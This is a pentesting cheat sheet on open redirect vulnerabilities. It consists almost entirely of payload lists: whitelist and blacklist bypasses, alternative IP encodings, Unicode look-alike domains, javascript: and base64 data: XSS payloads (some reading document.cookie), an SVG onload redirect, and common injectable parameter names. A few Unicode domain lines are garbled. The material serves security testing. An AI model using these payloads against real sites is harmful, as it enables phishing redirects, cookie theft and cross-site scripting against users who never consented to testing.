Pentesting

Open Redirect

Open redirect

Exploitation

Using a whitelisted domain or keyword

www.whitelisted.com.evil.com redirect to evil.com
https://www.target01.com//example.com/ redirect to //example.com/
https://www.target01.com%09.example.com redirect to example.com
https://www.target01.com%252e.example.com redirect to example.com

Using "//" to bypass "http" blacklisted keyword

//google.com

Using "https:" to bypass "//" blacklisted keyword

https:google.com

Using "//" to bypass "//" blacklisted keyword (Browsers see // as //)

\/\/google.com/
/\/google.com/

Using "/\" to bypass:

/\google.com

Using "%E3%80%82" to bypass "." blacklisted character

//google%E3%80%82com

Using null byte "%00" to bypass blacklist filter

//google%00.com

Using parameter pollution

?next=whitelisted.com&next=google.com

Using "@" character, browser will redirect to anything after the "@"

Creating folder as their domain

http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com

XSS from Open URL - If it's in a JS variable

";alert(0);//

XSS from data:// wrapper

http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==

Username

https://www.victim.co%[email protected]
https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)[email protected]

IP formats

216.58.215.78 -- Regular
3627734862 -- Decimal
0330.0072.0327.0116 -- Octal
00000330.00000072.00000327.00000116 -- Octal with junk zeros
0xd83ad74e -- Hex
0xd8.0x3a.0xd7.0x4e -- Hex (dot sepparated)
0x000000d8.0x0000003a.0x000000d7.0x0000004e -- Hex (dot sepparated) with junk zeros

You can also mix the different IP formats:

You can play with the different IP formats in https://www.silisoftware.com/tools/ipconverter.php

Parsing

http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾
⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗
⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰
⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ
Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ
ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿

Open Redirect to XSS

#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)
#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)
#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)
#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0
#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/

More domain bypasses

<>//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
/////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
///\;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
/〱Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
\/\/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
〱Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%00。Pⓦ
%01https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
%01https://google.com
////%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
////%09/google.com
///%09/google.com
//%09/google.com
/%09/google.com
////%09/[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///%09/[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//%09/[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%09/[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
&%0d%0a1Location:https://google.com
\152\141\166\141\163\143\162\151\160\164\072alert(1)
%19Jav%09asc%09ript:https%20://whitelisted.com/%250Aconfirm%25281%2529
////216.58.214.206
///216.58.214.206
//216.58.214.206
/\216.58.214.206
/216.58.214.206
216.58.214.206
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
%2f216.58.214.206//
%2f216.58.214.206
%2f216.58.214.206%2f%2f
////Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
//%2f%2fⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%2f%2fⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
%2f$2f216.58.214.206
$2f%2f216.58.214.206%2f%2f
%2f$2f3627734734
$2f%2f3627734734%2f%2f
//%2f%2fgoogle.com
/%2f%2fgoogle.com
$2f%2fgoogle.com
%2f$2fgoogle.com
$2f%2fgoogle.com%2f%2f
%2f3627734734//
%2f3627734734
%2f3627734734%2f%2f
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
%2fgoogle.com//
%2fgoogle.com
%2fgoogle.com%2f%2f
////3627734734
///3627734734
//3627734734
/\3627734734
/3627734734
3627734734
//[email protected]@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//[email protected][email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//[email protected]@google.com/
////%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
////%5cgoogle.com
///%5cgoogle.com
//%5cgoogle.com
/%5cgoogle.com
////%[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
///%[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
//%[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:[email protected]/
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@whitelisted.com/
";alert(0);//
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
data:whitelisted.com;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ%E3%80%82pw
//google%00.com
/\google%252ecom
google%252ecom
<>//google.com
/<>//google.com
//;@google.com
///;@google.com
/////google.com/
/////google.com
////\;@google.com
////google.com//
////google.com/
////google.com
///\;@google.com
///google.com//
///google.com/
///google.com
//\/google.com/
//\google.com
//google.com//
//google.com/
//google.com
/.google.com
/\/\/google.com/
/\/google.com/
/\/google.com
/\google.com
/〱google.com
/google.com
../google.com
.google.com
@google.com
\/\/google.com/
〱google.com
google.com
////google.com/%2e%2e
///google.com/%2e%2e
//google.com/%2e%2e
/google.com/%2e%2e
//google.com/%2E%2E
////google.com/%2e%2e%2f
///google.com/%2e%2e%2f
//google.com/%2e%2e%2f
////google.com/%2f..
///google.com/%2f..
//google.com/%2f..
//google.com/%2F..
/google.com/%2F..
////google.com/%2f%2e%2e
///google.com/%2f%2e%2e
//google.com/%2f%2e%2e
/google.com/%2f%2e%2e
//google.com//%2F%2E%2E
//google.com:[email protected]/
//google.com:80#@whitelisted.com/
google.com/.jpg
//google.com\twhitelisted.com/
//google.com/whitelisted.com
//google.com\@whitelisted.com
google.com/whitelisted.com
//google%E3%80%82com
/http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/http:/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http://;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http://.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http:/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http:Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http://00330.00072.0000326.00000316
http:00330.00072.0000326.00000316
http://00330.0x3a.54990
http:00330.0x3a.54990
http://00330.3856078
http:00330.3856078
http://0330.072.0326.0316
http:0330.072.0326.0316
http:%0a%0dⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
http:%0a%0dgoogle.com
http://0xd8.072.54990
http:0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http:0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http:0xd8.3856078
http://0xd83ad6ce
http:0xd83ad6ce
http://[::216.58.214.206]
http:[::216.58.214.206]
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%23.whitelisted.com/
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%2f%2f.whitelisted.com/
http://3627734734
http:3627734734
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%3F.whitelisted.com/
http://[email protected][::216.58.214.206]
http:[email protected][::216.58.214.206]
http://[email protected][::ffff:216.58.214.206]
http:[email protected][::ffff:216.58.214.206]
http://[email protected]@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://[email protected][email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://[email protected]@google.com/
http://472.314.470.462
http:472.314.470.462
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ%5c%5c.whitelisted.com/
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:[email protected]/
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ:80#@whitelisted.com/
http://[::ffff:216.58.214.206]
http:[::ffff:216.58.214.206]
/http://google.com
/http:/google.com
http://;@google.com
http://.google.com
http://google.com
http:/\/\google.com
http:/google.com
http:google.com
http://google.com%23.whitelisted.com/
http://google.com%2f%2f.whitelisted.com/
http://google.com%3F.whitelisted.com/
http://google.com%5c%5c.whitelisted.com/
http://google.com:[email protected]/
http://google.com:80#@whitelisted.com/
http://google.com\twhitelisted.com/
//https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https:Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://%09/Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/https://%09/google.com
https://%09/google.com
https://%09/[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://%09/[email protected]
https://%0a%0dⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://%0a%0dgoogle.com
//https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
//https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
/https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
https:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
https%3a%2f%2fgoogle.com%2f
/https://%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/https:/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
https://%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https:/%5cⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
/https://%5cgoogle.com
/https:/%5cgoogle.com/
https://%5cgoogle.com
https:/%5cgoogle.com/
/https://%[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://%[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
//https://google.com//
/https://google.com//
/https://google.com/
/https://google.com
/https:google.com
https://////google.com
https://google.com//
https://google.com/
https://google.com
https:/\google.com
https:google.com
//https:///google.com/%2e%2e
/https://google.com/%2e%2e
https:///google.com/%2e%2e
//https://google.com/%2e%2e%2f
https://google.com/%2e%2e%2f
/https://google.com/%2f..
https://google.com/%2f..
/https:///google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
https:///google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://:@google.com\@whitelisted.com
https://google.com?whitelisted.com
https://google.com/whitelisted.com
https://google.com\whitelisted.com
https://google.com#whitelisted.com
https://google%E3%80%82com
//https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
/https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
https://:@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@whitelisted.com
https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/whitelisted.com
https://whitelisted.com;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
/https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
https:///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
//https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
/https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
/https:///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
https:///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
https://[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
//https://[email protected]//
https://whitelisted.com;@google.com
https://whitelisted.com.google.com
/https://[email protected]/%2e%2e
https:///[email protected]/%2e%2e
//https://[email protected]/%2e%2e%2f
https://[email protected]/%2e%2e%2f
/https://[email protected]/%2f..
https://[email protected]/%2f..
/https:///[email protected]/%2f%2e%2e
/https://[email protected]/%2f%2e%2e
https:///[email protected]/%2f%2e%2e
https://[email protected]/%2f%2e%2e
https://whitelisted.com/https://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
https://whitelisted.com/https://google.com/
@https://www.google.com
http://Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twhitelisted.com/
http://[email protected][::216.58.214.206]
http:[email protected][::216.58.214.206]
http://whitelisted.com%2eⓁ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://whitelisted.com%2egoogle.com/
http://whitelisted.com:80%40Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://whitelisted.com:80%40google.com/
http://[email protected][::ffff:216.58.214.206]
http:[email protected][::ffff:216.58.214.206]
http://whitelisted.com+&@google.com#[email protected]/
http://whitelisted.com+&@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#[email protected]/
http://www.google.com\.whitelisted.com
http://www.Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\.whitelisted.com
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected][::216.58.214.206]
http:XY>.7d8T\[email protected][::216.58.214.206]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected]
http:XY>.7d8T\[email protected]
http://XY>.7d8T\[email protected][::ffff:216.58.214.206]
http:XY>.7d8T\[email protected][::ffff:216.58.214.206]
http://XY>.7d8T\[email protected]@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://XY>.7d8T\[email protected][email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
http://XY>.7d8T\[email protected]@google.com/
ja\nva\tscript\r:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
java%0dscript:alert(1)
Javas%26%2399;ript:alert(1)
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\twhitelisted.com/
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
////[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
////[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/whitelisted.com
//Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ\@whitelisted.com
//[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ//
//[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/whitelisted.com
whitelisted.com;@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ
////[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
////[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
//[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e%2f
////[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
//[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f..
////[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
///[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
//[email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2f%2e%2e
/\whitelisted.com:80%40google.com
whitelisted.com;@google.com
whitelisted.com.google.com
////[email protected]/%2e%2e%2f
///[email protected]/%2e%2e%2f
//[email protected]/%2e%2e%2f
////[email protected]/%2f%2e%2e
///[email protected]/%2f%2e%2e
//[email protected]/%2f%2e%2e
//whitelisted.com+&@google.com#[email protected]/
//[email protected]:///Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/%2e%2e
//[email protected]:///google.com/%2e%2e
//whitelisted.com+&@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ#[email protected]/
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
//XY>.7d8T\[email protected]@Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//XY>.7d8T\[email protected][email protected]Ⓛ𝐨𝗰�𝕝ⅆ𝓸ⓜₐℹⓃ。Pⓦ/
//XY>.7d8T\[email protected]@google.com/

Open Redirect uploading svg files

<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>

Common injection parameters

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
